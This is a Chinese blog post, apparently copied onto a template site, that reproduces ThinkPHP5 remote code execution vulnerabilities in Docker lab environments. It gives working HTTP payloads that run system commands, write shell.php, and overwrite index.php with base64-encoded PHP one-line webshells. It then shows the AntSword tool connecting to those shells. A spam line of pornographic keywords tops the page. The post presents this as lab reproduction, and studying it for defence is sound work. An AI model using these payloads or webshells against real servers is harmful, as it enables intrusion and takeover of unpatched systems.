国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁
  2. >Toy博客

ThinkPHP5系列遠程代碼執(zhí)行漏洞復(fù)現(xiàn)(詳細)

2年前作者:hh_y分類:Toy博客閱讀(28)違法舉報

這篇具有很好參考價值的文章主要介紹了ThinkPHP5系列遠程代碼執(zhí)行漏洞復(fù)現(xiàn)(詳細)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

一:5.0.23-rce版本漏洞復(fù)現(xiàn)

漏洞描述

ThinkPHP是一款運用極廣的PHP開發(fā)框架。其版本5中,由于框架對控制器名沒有進行足夠的檢測,會導(dǎo)致在沒有開啟強制路由的情況下可執(zhí)行任意方法,從而導(dǎo)致遠程命令執(zhí)行漏洞。 漏洞危害

環(huán)境搭建

啟動環(huán)境

切換到/thinkphp/5.0.23-rce# 目錄下


vim docker-compose.yml
thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

將version改為2,保存并退出

接著執(zhí)行


docker-compose?up?-d
thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

此時環(huán)境搭建成功

thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

漏洞復(fù)現(xiàn)

在網(wǎng)頁上利用POST構(gòu)造payload

(1)查看目錄下的文件(ls)


_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls
thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

(2)查看id


_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

(3)查看當(dāng)前目錄


_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

將上述代碼改為phpinfo,發(fā)現(xiàn)是可以輸出關(guān)于 PHP 配置的信息


_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1
thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

利用蟻劍工具getshell

由于存在過濾,需要用到base64加密來使我們的一句話木馬上傳成功

我們知道了一定存在index.php這個文件,那么我們就對其進行修改為一句話木馬的樣式

利用 echo “” >index.php 進行測試

為了顯示我們成功注入,我們在其中添加字段變?yōu)?/p>

echo “aaabbb” >index.php

對引號內(nèi)的進行base64,注意此時的引號不需要進行加密

經(jīng)過測試,發(fā)現(xiàn)eval函數(shù)是注入不了的,需要替換為arrest函數(shù)才可以成功注入

所以

?文章來源地址http://www.zghlxwxcb.cn/news/detail-518663.html

將aaa<?php @assert($_POST['xss']);?>bbb 進行base64編碼

?

thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

?


_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg== | base64 -d > index.php
thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

成功回顯出aaabbb,說明是加入到了index.php里了

開始用蟻劍,URL地址填寫我們一句話木馬的位置

注意要選擇char16和base64

thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔
thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

測試連接成功

可以看到我們剛才寫入的一句話

thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

?

二:5-rce版本漏洞復(fù)現(xiàn)(Thinkphp5 5.0.22/5.1.29)

環(huán)境搭建

?

啟動環(huán)境

切換到/thinkphp/5-rce# 目錄下

?


vim docker-compose.yml
thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

將version改為2,保存并退出

接著執(zhí)行


docker-compose?up?-d
thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

此時環(huán)境以成功搭建

thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

漏洞復(fù)現(xiàn)

(1)輸出關(guān)于 PHP 配置的信息


/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

(2)whoami


/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

(3)還可以將php代碼寫入文件


/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php phpinfo(); ?>
thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

接著訪問shell.php

thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

?

利用蟻劍工具getshell

由于存在過濾,需要用到base64加密來使我們的一句話木馬上傳成功

我們知道了一定存在index.php這個文件,那么我們就對其進行修改為一句話木馬的樣式


aa<?php @eval($_REQUEST['attack']) ?>bb

將上面的一句話進行base64加密

thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

將一句話寫入index.php


/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo     -n YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2F0dGFjayddKSA/PmJi | base64 -d > index.php
thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

成功回顯出aabb,說明是加入到了index.php里了

開始用蟻劍,URL地址填寫我們一句話木馬的位置

注意要選擇char16和base64

thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔
thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

測試連接成功

可以看到我們剛才寫入的一句話

thinkphp遠程命令執(zhí)行漏洞,網(wǎng)絡(luò)安全,php,服務(wù)器,Powered by 金山文檔

此時復(fù)現(xiàn)圓滿完成~

?

到了這里,關(guān)于ThinkPHP5系列遠程代碼執(zhí)行漏洞復(fù)現(xiàn)(詳細)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • ThinkPHP5.0.21遠程命令執(zhí)行漏洞

    ThinkPHP5.0.21遠程命令執(zhí)行漏洞

    漏洞出現(xiàn)的背景 : ThinkPHP是?款運?極?的PHP開發(fā)框架。 其5.0.23以前的版本中,獲取method的?法中沒有正確處理?法名, 導(dǎo)致攻擊者可以調(diào)?Request類任意?法并構(gòu)造利?鏈,從?導(dǎo)致遠程代碼執(zhí)?漏洞。 由于ThinkPHP5框架對控制器名沒有進??夠的安全檢測,導(dǎo)致在沒有開

    2024年02月04日
    瀏覽(22)
  • Thinkphp5.x全漏洞復(fù)現(xiàn)分析

    Thinkphp5.x全漏洞復(fù)現(xiàn)分析

    我們可以把namespace理解為一個單獨的空間,事實上它也就是一個空間而已,子命名空間那就是空間里再劃分幾個小空間,舉個例子: 當(dāng)有多個子命名空間有相同名稱類時,不指定使用哪個命名空間的情況下取最后定義的命名空間中的類,比如上面的 dog 取的時 dogC 中的類,在

    2024年04月22日
    瀏覽(24)

  • Http.sys遠程代碼執(zhí)行漏洞復(fù)現(xiàn)

    Http.sys是Microsoft Windows處理HTTP請求的內(nèi)核驅(qū)動程序。HTTP.sys會錯誤解析某些特殊構(gòu)造的HTTP請求,導(dǎo)致遠程代碼執(zhí)行漏洞。成功利用此漏洞后,攻擊者可在System帳戶上下文中執(zhí)行任意代碼。由于此漏洞存在于內(nèi)核驅(qū)動程序中,攻擊者也可以遠程導(dǎo)致操作系統(tǒng)藍屏。此次受影響的

    2023年04月26日
    瀏覽(26)
  • Office遠程代碼執(zhí)行漏洞(CVE-2017-11882)漏洞復(fù)現(xiàn)

    Office遠程代碼執(zhí)行漏洞(CVE-2017-11882)漏洞復(fù)現(xiàn)

    CVE-2017-11882允許攻擊者在當(dāng)前用戶的上下文中運行任意代碼,導(dǎo)致無法正確處理內(nèi)存中的對象,即為“ Microsoft Office Memory Corruption Vulnerability “,棧溢出的遠程執(zhí)行漏洞 該漏洞是在 EQNEDT32.EXE 組件的緩沖區(qū)溢出導(dǎo)致。當(dāng)受害用戶打開Office文檔時就有可能被漏洞利用,危害極大。

    2024年02月12日
    瀏覽(24)
  • 漏洞復(fù)現(xiàn)-Drupal遠程代碼執(zhí)行漏洞(CVE-2018-7602)

    漏洞復(fù)現(xiàn)-Drupal遠程代碼執(zhí)行漏洞(CVE-2018-7602)

    Drupal 7.x 和 8.x 的多個子系統(tǒng)中存在一個遠程執(zhí)行代碼漏洞。這可能允許攻擊者利用 Drupal 站點上的多個攻擊媒介,從而導(dǎo)致該站點受到威脅。此漏洞與 Drupal 核心 - 高度關(guān)鍵 - 遠程代碼執(zhí)行 - SA-CORE-2018-002 有關(guān)。SA-CORE-2018-002 和此漏洞都在野外被利用。 -c 后面接命令,緊隨賬號

    2024年02月16日
    瀏覽(22)

  • 漏洞復(fù)現(xiàn) CVE-2023-0297( pyload遠程代碼執(zhí)行漏洞 )

    在 addcrypted2() 函數(shù)中,對傳入的參數(shù) jk 解析后用 eval_js() 作為 JS 語句執(zhí)行。 利用 JS 中 pyimport 導(dǎo)入 OS 包,執(zhí)行系統(tǒng)命令(文件操作,進程管理),還可以利用 os.system() 執(zhí)行 shell 命令。 構(gòu)建 payload 過程比較簡單,只要傳入所需的 package, crypted, jk, passwords 四個參數(shù)即可,這里

    2024年02月08日
    瀏覽(22)
  • CVE-2019-0708遠程桌面服務(wù)遠程執(zhí)行代碼漏洞復(fù)現(xiàn)

    CVE-2019-0708遠程桌面服務(wù)遠程執(zhí)行代碼漏洞復(fù)現(xiàn)

    1、相關(guān)簡介 Windows再次被曝出一個破壞力巨大的高危遠程漏洞CVE-2019-0708。攻擊者一旦成功利用該漏洞,便可以在目標(biāo)系統(tǒng)上執(zhí)行任意代碼,包括獲取敏感信息、執(zhí)行遠程代碼、發(fā)起拒絕服務(wù)攻擊等等攻擊行為。2019年5月14日微軟官方發(fā)布安全補丁,修復(fù)了windows遠程桌面服務(wù)的遠

    2024年02月10日
    瀏覽(22)
  • [漏洞復(fù)現(xiàn)] jenkins 遠程代碼執(zhí)行 (CVE-2019-100300)

    [漏洞復(fù)現(xiàn)] jenkins 遠程代碼執(zhí)行 (CVE-2019-100300)

    擁有Overall/Read 權(quán)限的用戶可以繞過沙盒保護,在jenkins可以執(zhí)行任意代碼。此漏洞需要一個賬號密碼和一個存在的job。 Jenkins的pipeline主要是通過一個配置文件或者job里面的pipeline腳本配置來設(shè)定每個job的步驟. pipeline定義了幾乎所有要用到的流程, 比如執(zhí)行shell, 存檔, 生成測試

    2024年02月16日
    瀏覽(19)

  • PhpMyAdmin遠程執(zhí)行代碼漏洞復(fù)現(xiàn) (CVE-2016-5734)

    0x01 漏洞介紹 phpMyAdmin是phpMyAdmin團隊開發(fā)的一套免費的、基于Web的MySQL數(shù)據(jù)庫管理工具。該工具能夠創(chuàng)建和刪除數(shù)據(jù)庫,創(chuàng)建、刪除、修改數(shù)據(jù)庫表,執(zhí)行SQL腳本命令等。 phpMyAdmin 中存在安全漏洞,該漏洞源于程序沒有正確選擇分隔符來避免使用 preg_replace e 修飾符。 可借助特

    2024年02月11日
    瀏覽(18)
  • CVE-2019-11043(PHP遠程代碼執(zhí)行漏洞)復(fù)現(xiàn)

    CVE-2019-11043(PHP遠程代碼執(zhí)行漏洞)復(fù)現(xiàn)

    今天繼續(xù)給大家介紹滲透測試相關(guān)知識,本文主要內(nèi)容是CVE-2019-11043(PHP遠程代碼執(zhí)行漏洞)復(fù)現(xiàn)。 免責(zé)聲明: 本文所介紹的內(nèi)容僅做學(xué)習(xí)交流使用,嚴禁利用文中技術(shù)進行非法行為,否則造成一切嚴重后果自負! 再次強調(diào):嚴禁對未授權(quán)設(shè)備進行滲透測試! CVE-2019-11043漏

    2024年02月06日
    瀏覽(22)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包